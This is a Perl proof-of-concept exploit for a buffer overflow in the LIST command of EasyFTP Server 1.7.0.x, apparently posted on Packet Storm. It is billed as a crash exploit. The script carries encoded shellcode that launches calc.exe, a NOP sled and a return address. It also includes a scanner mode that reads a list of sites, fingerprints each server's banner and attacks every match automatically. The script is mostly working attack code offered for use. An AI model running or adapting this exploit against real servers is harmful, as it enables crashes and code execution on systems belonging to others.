EasyFTP version 1.7.0.x denial of service crash exploit.
4f62fdb823b884f987996e4249ea54ebfa8aaef6f2a34deaa38693c779b03683
sub banner {
print q {
##########################################################################################################
# #
# [*] PoC EasyFTP 1.7.0.X Crash #
# #
# [*] Author: Fernando Mengali #
# #
# [*] e-mail: fernando.mengalli@gmail.com #
# #
# [*] Date: 18/10/2010 #
# #
# [*] Version Vulnerable: #
# #
# - EasyFTP Server 1.7.0.11 EN #
# #
# - EasyFTP Server 1.7.0.2 EN #
# #
# #
# #
# [*] System Operacional Tested: #
# #
# - Windows XP PACK 3 Brazilian #
# #
# #
# #
# #
# - EasyFTP Server 1.7.0.2 => http://easyftpsvr.googlecode.com/files/easyftpsvr-1.7.0.2.zip #
# #
# - EasyFTP Server 1.7.0.11 => http://easyftpsvr.googlecode.com/files/easyftp-server-1.7.0.11-en.zip #
# #
# #
###############################Code Exploit ##############################################################
}
}
#!usr/bin/perl
use strict;
use IO::Socket;
use IO::Socket::INET;
if (!$ARGV[0]) {
&banner();
print q {
Options:
[1] - Test Exploit
[2] - Test ScanXploit
}
}
print " [+] Options: "; our $option = <stdin>;
chomp ($option);
if ($option == 1) {
my $portTest ="21";
my $hostTest="127.0.0.1";
my $usuarioTest ="anonymous";
my $senhaTest = "adminadmin";
# Buffer needed -> 272 bytes
# Metasploit Shellcode PoC - Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars \x00\x0a\x2f\x5c ]
my $shellCodeTest = ("\xda\xc0\xd9\x74\x24\xf4\xbb\xe6\x9a\xc9\x6d\x5a\x33\xc9\xb1\x33\x31\x5a\x18\x83\xea\xfc\x03\x5a\xf2\x78\x3c\x91\x12\xf5\xbf\x6a\xe2\x66\x49\x8f\xd3\xb4\x2d\xdb\x41\x09\x25\x89\x69\xe2\x6b\x3a\xfa\x86\xa3\x4d\x4b\x2c\x92\x60\x4c\x80\x1a\x2e\x8e\x82\xe6\x2d\xc2\x64\xd6\xfd\x17\x64\x1f\xe3\xd7\x34\xc8\x6f\x45\xa9\x7d\x2d\x55\xc8\x51\x39\xe5\xb2\xd4\xfe\x91\x08\xd6\x2e\x09\x06\x90\xd6\x22\x40\x01\xe6\xe7\x92\x7d\xa1\x8c\x61\xf5\x30\x44\xb8\xf6\x02\xa8\x17\xc9\xaa\x25\x69\x0d\x0c\xd5\x1c\x65\x6e\x68\x27\xbe\x0c\xb6\xa2\x23\xb6\x3d\x14\x80\x46\x92\xc3\x43\x44\x5f\x87\x0c\x49\x5e\x44\x27\x75\xeb\x6b\xe8\xff\xaf\x4f\x2c\x5b\x74\xf1\x75\x01\xdb\x0e\x65\xed\x84\xaa\xed\x1c\xd1\xcd\xaf\x4a\x24\x5f\xca\x32\x26\x5f\xd5\x14\x4e\x6e\x5e\xfb\x09\x6f\xb5\xbf\xe5\x25\x94\x96\x6d\xe0\x4c\xab\xf0\x13\xbb\xe8\x0c\x90\x4e\x91\xeb\x88\x3a\x94\xb0\x0e\xd6\xe4\xa9\xfa\xd8\x5b\xca\x2e\xbb\x3a\x58\xb2\x12\xd8\xd8\x51\x6b\x28");
my $nopsTest = ("\x90" x 40);
my $retornoTest = ("\x10\x3B\x88\x00"); # MAGIC RET 00883B10 [ CALL EDI ]
my $PayloadTest = $nopsTest . $shellCodeTest . $retornoTest;
my $AutenticarTest = ("\x55\x53\x45\x52\x20" . $usuarioTest . "\r\n" . "\x50\x41\x53\x53\x20 " . $senhaTest . "\r\n" . "LIST " . $PayloadTest . "\r\n" );
my $socketTest = new IO::Socket::INET (PeerAddr => $hostTest,PeerPort => $portTest,Proto => 'tcp',); die " [x] Error: $!\n" unless $socketTest;
print $socketTest $AutenticarTest;
close($socketTest);
sleep(2);
our $soquetes = IO::Socket::INET->new("$hostTest:$portTest");
if($soquetes) {
print " [-] Server no exploited \n";
}
else {
print " [+] Server Exploited\n";
}
}
################################## ScanXploit #############################################################################################
if ($option == 2) {
print " [+] Digite o nome da lista de sites, exampl,: lista.txt: ";
our $lista = <stdin>;
chomp ($lista);
open( SITE, "< $lista" ) or die( " [-] Could not open file: $!" );
our @array = <SITE>;
our $numero = $#array;
for (our $i = 0; $i <= $numero; $i++) {
our $Url = "$array[$i]";
if($Url !~ /http:\/\//) { $Url = "http://$Url"; }
our $Stop = index($Url,":");
our $Protocolo = substr($Url,0,$Stop);
our $Start = index($Url,"//") + 2;
our $Dominio = substr($Url,$Start);
our $Stop = index($Dominio,"/");
our $Dominio = substr($Dominio,0,$Stop);
our $Start = rindex($Url,"/") + 1;
our $NomeArq = substr($Url,$Start);
our $Compr_Url = length($Url);
our $ponto = "$Dominio \n";
our @portas = "21";
foreach our $porta (@portas) {
our $sock = IO::Socket::INET->new("$ponto:$porta");
if($sock) {
our $remote = IO::Socket::INET -> new (Proto => "tcp", PeerAddr => $ponto, PeerPort => $porta, Timeout => "7");
our $line = <$remote>;
if ($line =~ "BigFoolCat") {
my $usuario ="anonymous";
my $senha = "adminadmin";
# Buffer needed -> 272 bytes
# Metasploit Shellcode PoC - Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars \x00\x0a\x2f\x5c ]
my $shellCode = ("\xda\xc0\xd9\x74\x24\xf4\xbb\xe6\x9a\xc9\x6d\x5a\x33\xc9\xb1\x33\x31\x5a\x18\x83\xea\xfc\x03\x5a\xf2\x78\x3c\x91\x12\xf5\xbf\x6a\xe2\x66\x49\x8f\xd3\xb4\x2d\xdb\x41\x09\x25\x89\x69\xe2\x6b\x3a\xfa\x86\xa3\x4d\x4b\x2c\x92\x60\x4c\x80\x1a\x2e\x8e\x82\xe6\x2d\xc2\x64\xd6\xfd\x17\x64\x1f\xe3\xd7\x34\xc8\x6f\x45\xa9\x7d\x2d\x55\xc8\x51\x39\xe5\xb2\xd4\xfe\x91\x08\xd6\x2e\x09\x06\x90\xd6\x22\x40\x01\xe6\xe7\x92\x7d\xa1\x8c\x61\xf5\x30\x44\xb8\xf6\x02\xa8\x17\xc9\xaa\x25\x69\x0d\x0c\xd5\x1c\x65\x6e\x68\x27\xbe\x0c\xb6\xa2\x23\xb6\x3d\x14\x80\x46\x92\xc3\x43\x44\x5f\x87\x0c\x49\x5e\x44\x27\x75\xeb\x6b\xe8\xff\xaf\x4f\x2c\x5b\x74\xf1\x75\x01\xdb\x0e\x65\xed\x84\xaa\xed\x1c\xd1\xcd\xaf\x4a\x24\x5f\xca\x32\x26\x5f\xd5\x14\x4e\x6e\x5e\xfb\x09\x6f\xb5\xbf\xe5\x25\x94\x96\x6d\xe0\x4c\xab\xf0\x13\xbb\xe8\x0c\x90\x4e\x91\xeb\x88\x3a\x94\xb0\x0e\xd6\xe4\xa9\xfa\xd8\x5b\xca\x2e\xbb\x3a\x58\xb2\x12\xd8\xd8\x51\x6b\x28");
my $nops = ("\x90" x 40);
my $retorno = ("\x10\x3B\x88\x00"); # MAGIC RET 00883B10 [ CALL EDI ]
my $Payload = $nops . $shellCode . $retorno;
my $Autenticar = ("\x55\x53\x45\x52\x20" . $usuario . "\r\n" . "\x50\x41\x53\x53\x20 " . $senha . "\r\n" . "LIST " . $Payload . "\r\n" );
our $socket = new IO::Socket::INET (PeerAddr => $ponto,PeerPort => $porta,Proto => 'tcp',); die "[x] Error: $!\n" unless $socket;
print $socket $Autenticar;
close($socket);
}
sleep(2);
our $soquete = IO::Socket::INET->new("$ponto:$porta");
if($soquete) {
print " [-] Server no exploited \n";
}
else {
print " [+] Server Exploited\n";
}
}
}
}
print " [+] Servers tested: $numero \n";
}
if ($option != 1 && $option != 2 ) {
print " [+] Option invalid \n\n";
}
exit;
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed